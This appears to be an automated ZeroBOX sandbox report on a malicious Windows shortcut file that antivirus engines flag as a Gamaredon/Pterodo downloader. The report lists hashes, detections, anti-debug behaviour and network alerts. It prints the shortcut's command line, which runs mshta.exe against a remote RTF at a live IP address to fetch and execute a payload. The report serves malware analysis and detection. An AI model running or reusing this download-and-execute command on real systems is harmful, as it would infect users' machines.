popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

49fd9bf8a9029185e03f469c388fbe3c.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 10, 2024, 6:23 p.m. Aug. 10, 2024, 6:26 p.m.
Size 997.0B
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Sun Oct 1 11:50:20 2023, mtime=Sun Oct 1 11:50:20 2023, atime=Sun Dec 31 19:48:41 2017, length=14848, window=hide
MD5 49fd9bf8a9029185e03f469c388fbe3c
SHA256 bec05802abb6bb5068092983510d1ee0cc7252c2c3c9ab8bf4947c34341eb854
CRC32 51432773
ssdeep 12:8eNDGBm/oPocuW+VSXcJZECAAhSSxD8jAisPMfwXvfcoAOdE8niNNjJoJM7+lbYQ:8eN3wPc5DhSSx8AieiGcN8WFab+mE
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
5.39.254.55 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49164 -> 5.39.254.55:80 2027257 ET INFO Dotted Quad Host RTF Request Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://5.39.254.55/sp_08.08/days.rtf
request GET http://5.39.254.55/sp_08.08/days.rtf
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2664
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73352000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\49fd9bf8a9029185e03f469c388fbe3c.lnk
cmdline "C:\Windows\System32\mshta.exe" http://5.39.254.55/sp_08.08/days.rtf /f
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2664
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 5.39.254.55
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002d4
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
Process injection Process 2552 resumed a thread in remote process 2664
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2664
1 0 0
Lionic Trojan.WinLNK.Nioc.4!c
Cynet Malicious (score: 99)
CAT-QuickHeal LNK.APT.43736
VIPRE Heur.BZC.YAX.Nioc.1.0B26EB2A
Arcabit Heur.BZC.YAX.Nioc.1.0B26EB2A
Symantec Trojan.Gen.NPE
ESET-NOD32 LNK/TrojanDownloader.Pterodo.G
Avast LNK:Agent-CR [Trj]
Kaspersky HEUR:Trojan.WinLNK.Gamaredon.gen
BitDefender Heur.BZC.YAX.Nioc.1.0B26EB2A
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0B26EB2A
Emsisoft Heur.BZC.YAX.Nioc.1.0B26EB2A (B)
F-Secure Malware.LNK/Dldr.Agent.VPTN
FireEye Heur.BZC.YAX.Nioc.1.0B26EB2A
Sophos Troj/DownLnk-X
Google Detected
Avira LNK/Dldr.Agent.VPTN
MAX malware (ai score=83)
Microsoft Trojan:Win32/ShortSeek.E!dha
ZoneAlarm HEUR:Trojan.WinLNK.Gamaredon.gen
GData Heur.BZC.YAX.Nioc.1.0B26EB2A
Varist LNK/ABTrojan.UXKK-
Zoner Probably Heur.LNKScript
Tencent Win32.Trojan.Gamaredon.Rsmw
huorong Trojan/LNK.Starter.r
Fortinet LNK/Agent.VPTN!tr
AVG LNK:Agent-CR [Trj]
alibabacloud Trojan[downloader]:Win/ShortSeek.E9hyq